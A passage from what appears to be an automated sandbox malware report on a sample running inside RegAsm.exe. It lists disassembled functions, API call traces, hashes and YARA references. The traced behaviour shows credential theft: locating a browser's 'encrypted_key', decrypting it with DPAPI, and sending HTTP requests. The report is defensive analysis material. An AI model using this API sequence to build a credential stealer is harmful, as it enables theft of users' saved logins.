                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$OpenQueryValuememset
                                                        • String ID:
                                                        • API String ID: 558315959-0
                                                        • Opcode ID: 82c1b3985cc3a9d66cbad688bd9496c65cb1d60cfb5cb2d71dd752669d3d7d74
                                                        • Instruction ID: 25054cb158857c5efd89c877658bc23b60a16a4ce732fd79bd04df553ef25ba9
                                                        • Opcode Fuzzy Hash: 82c1b3985cc3a9d66cbad688bd9496c65cb1d60cfb5cb2d71dd752669d3d7d74
                                                        • Instruction Fuzzy Hash: 16417DB580010DBFDF10AFA1DC46DDD3B7DEB04349F504066F944A21A2EA359B998FA1
                                                        Function 00418458 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,0041E266,00000000,00421EE4,?,004192E8,?,?,00415D1F,00000000,?,0041932E,?), ref: 004184AC
                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,0041E266,00000000,00421EE4,?,004192E8,?,?,00415D1F,00000000), ref: 004184E6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreatePointer
                                                        • String ID:
                                                        • API String ID: 2024441833-0
                                                        • Opcode ID: d9e11fae8d3888f70713cf99105a2011703aff6a473124166f8f88cf3e244894
                                                        • Instruction ID: 3fd7dd3e0ab0a7b1e1ff3868ed10d50e55af647c5119b5da05aea6427e04f7b4
                                                        • Opcode Fuzzy Hash: d9e11fae8d3888f70713cf99105a2011703aff6a473124166f8f88cf3e244894
                                                        • Instruction Fuzzy Hash: BB3143B0500745AFDB30CF258884AA77BA9FB15358F108A3FE59686640DB78DDC48B59
                                                        Function 6C0DC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNEL32(?), ref: 6C0DC947
                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C0DC969
                                                        • GetSystemInfo.KERNEL32(?), ref: 6C0DC9A9
                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C0DC9C8
                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C0DC9E2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                        • String ID:
                                                        • API String ID: 4191843772-0
                                                        • Opcode ID: eec97b31dc0d5bb5d380d5a41a5da1ad4e8528a23d754c4de7cb3a5c6c3ae2c9
                                                        • Instruction ID: e6edba3e50b45e9e6b1da8530a1757b6cffe4295a5610deccc2e10aa35914203
                                                        • Opcode Fuzzy Hash: eec97b31dc0d5bb5d380d5a41a5da1ad4e8528a23d754c4de7cb3a5c6c3ae2c9
                                                        • Instruction Fuzzy Hash: 6021F971741714ABDB14BB24DC88BAEB3F9AF4674CF61411AF917A7B80EB706C448B90
                                                        Function 0040B51E Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 004069B4: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00421EE4,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069D2
                                                          • Part of subcall function 004069B4: GetFileSizeEx.KERNEL32(00000000,?,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069E9
                                                          • Part of subcall function 004069B4: LocalAlloc.KERNEL32(00000040,?,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A05
                                                          • Part of subcall function 004069B4: ReadFile.KERNEL32(?,00000000,?,0040B0D3,00000000,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A1F
                                                          • Part of subcall function 004069B4: CloseHandle.KERNEL32(?,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A40
                                                          • Part of subcall function 0040F896: LocalAlloc.KERNEL32(00000040,00411800,ERROR,00421C30,?,004117FF,00000000,00000000), ref: 0040F8AF
                                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,?,?,?,?,?), ref: 0040B568
                                                          • Part of subcall function 00406A53: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Oa@,00000000,00000000), ref: 00406A73
                                                          • Part of subcall function 00406A53: LocalAlloc.KERNEL32(00000040,Oa@,?,?,0040614F,00000000,?,?,?,?,?,?,?,?,00421EE4), ref: 00406A81
                                                          • Part of subcall function 00406A53: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Oa@,00000000,00000000), ref: 00406A97
                                                          • Part of subcall function 00406A53: LocalFree.KERNEL32(00000000,?,?,0040614F,00000000,?,?,?,?,?,?,?,?,00421EE4), ref: 00406AA6
                                                        • memcmp.MSVCRT ref: 0040B5A6
                                                          • Part of subcall function 00406AB6: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406AD9
                                                          • Part of subcall function 00406AB6: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406AF1
                                                          • Part of subcall function 00406AB6: LocalFree.KERNEL32(?), ref: 00406B0F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                        • String ID: $"encrypted_key":"$DPAPI
                                                        • API String ID: 512175977-738592651
                                                        • Opcode ID: 805639625063d47cb4f6794467d6958f57f1f60dd40407e0cb9b8d904e0a7cf9
                                                        • Instruction ID: eb8ba2f465d2d0f76deb85606ed928f22174b3df59931f0e88d56dacf5e90862
                                                        • Opcode Fuzzy Hash: 805639625063d47cb4f6794467d6958f57f1f60dd40407e0cb9b8d904e0a7cf9
                                                        • Instruction Fuzzy Hash: 09217FB6E0010877DF15AAA69C02ADF37BCDE14308F0441B6F911F11D1FB39D61486AD
                                                        Function 00406CC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,0040AFCE), ref: 00406CDE
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E603: lstrlenA.KERNEL32(?,0000000C,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E60C
                                                          • Part of subcall function 0040E603: lstrcpyA.KERNEL32(00000000,00000000,?,0041486A,0041E266,0041E266,00000000,0000000C,00000000,?,00415D1F), ref: 0040E640
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,00421410,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041E266), ref: 00406D42
                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040AFCE), ref: 00406D56
                                                        Strings
                                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00406CD2, 00406CD7, 00406CF1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                        • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                        • API String ID: 2929475105-3463377506
                                                        • Opcode ID: 2638e307a144db0fb0b497cb8faab1cb62e43fea65b675c7c470b727e1e28b7d
                                                        • Instruction ID: 13ef6b8f4b86bd86c561f48592180f7df49431361618b9813af64ae7b1900c00
                                                        • Opcode Fuzzy Hash: 2638e307a144db0fb0b497cb8faab1cb62e43fea65b675c7c470b727e1e28b7d
                                                        • Instruction Fuzzy Hash: F531FB71903615AFEB21BF62EC118AA7B67EB14704710953AF902632F5DF350922DFA4
                                                        Function 004118D1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 004118D6
                                                        • lstrlenA.KERNEL32(00000000), ref: 004118F3
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041198F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: H_prologlstrlen
                                                        • String ID: ERROR
                                                        • API String ID: 2133942097-2861137601
                                                        • Opcode ID: 44ccc94b4b2816705cd79ca17cd054dde8e8b7cbe19677e93443250a16469f1e
                                                        • Instruction ID: 1eecdeaa4bf28d228bf99aafebdf8b7f1fde90179f2407ac9225650812c84225
                                                        • Opcode Fuzzy Hash: 44ccc94b4b2816705cd79ca17cd054dde8e8b7cbe19677e93443250a16469f1e
                                                        • Instruction Fuzzy Hash: F421A571910104ABCB04FFA6DC56AEE7B78EF11358F00493AF501A71E2EB39D654CB99
                                                        Function 004116E3 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 0040503C: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040508C
                                                          • Part of subcall function 0040503C: StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00421EE4), ref: 004050A0
                                                          • Part of subcall function 0040503C: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050C3
                                                          • Part of subcall function 0040503C: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 004050F9
                                                          • Part of subcall function 0040503C: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040511D
                                                          • Part of subcall function 0040503C: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405128
                                                          • Part of subcall function 0040503C: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405146
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,ERROR,0041224B), ref: 00411724
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                        • String ID: ERROR$K"A$K"A
                                                        • API String ID: 3086566538-2371879956
                                                        • Opcode ID: bd1b5dc44e6368f3db6891579927c35550295b2b9e4edd9ae61d92c791ecb418
                                                        • Instruction ID: 0b8fdbd9dd23c6950a7e6d92d012d58a3b080ee7526b5aa2b6032dac35410998
                                                        • Opcode Fuzzy Hash: bd1b5dc44e6368f3db6891579927c35550295b2b9e4edd9ae61d92c791ecb418
                                                        • Instruction Fuzzy Hash: 87012571900018ABCB14FBB3DC569DD3768AF00348B50493AFC16A71D2FF38A719CA99
                                                        Function 00409020 Relevance: 6.2, APIs: 4, Instructions: 242filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040F6C3: GetSystemTime.KERNEL32(00000000,0041E266,0041E266,00421EE4,00000000), ref: 0040F6EC
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,0041E264,?,00000000,0041E266,00000000,0041E266), ref: 004090DE
                                                        • lstrlenA.KERNEL32(00000000), ref: 00409249
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040925D
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 0041296A: _MSFOpenExW.MSPDB140-MSVCRT ref: 00412A12
                                                          • Part of subcall function 0041296A: CreateThread.KERNEL32(00000000,00000000,004118D1,?,00000000,00000000), ref: 00412A27
                                                          • Part of subcall function 0041296A: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00412A2F
                                                        • DeleteFileA.KERNEL32(00000000), ref: 004092CD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyCreateDeleteObjectOpenSingleSystemThreadTimeWait
                                                        • String ID:
                                                        • API String ID: 1565825518-0
                                                        • Opcode ID: 4f6fec1c425aba39f308193b3505de1c3ddb42984ffec3721ee0541392b56d35
                                                        • Instruction ID: 1afd4df918fc48e405879f69a40a88149f548c732ad5be0718203a8cf9af1c7e
                                                        • Opcode Fuzzy Hash: 4f6fec1c425aba39f308193b3505de1c3ddb42984ffec3721ee0541392b56d35
                                                        • Instruction Fuzzy Hash: 8E81B472900118AADF14FBE2DD56CEE7779AE14309B50093BF406B20E2FF396A15CA65
                                                        Function 0040A91F Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 152stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 004069B4: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00421EE4,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069D2
                                                          • Part of subcall function 004069B4: GetFileSizeEx.KERNEL32(00000000,?,?,?,0040B0D3,?,?,?,00421EE4), ref: 004069E9
                                                          • Part of subcall function 004069B4: LocalAlloc.KERNEL32(00000040,?,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A05
                                                          • Part of subcall function 004069B4: ReadFile.KERNEL32(?,00000000,?,0040B0D3,00000000,?,0041E266,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A1F
                                                          • Part of subcall function 004069B4: CloseHandle.KERNEL32(?,?,?,0040B0D3,?,?,?,00421EE4), ref: 00406A40
                                                          • Part of subcall function 0040F896: LocalAlloc.KERNEL32(00000040,00411800,ERROR,00421C30,?,004117FF,00000000,00000000), ref: 0040F8AF
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421550,0041E266), ref: 0040A9C2
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040A9DE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
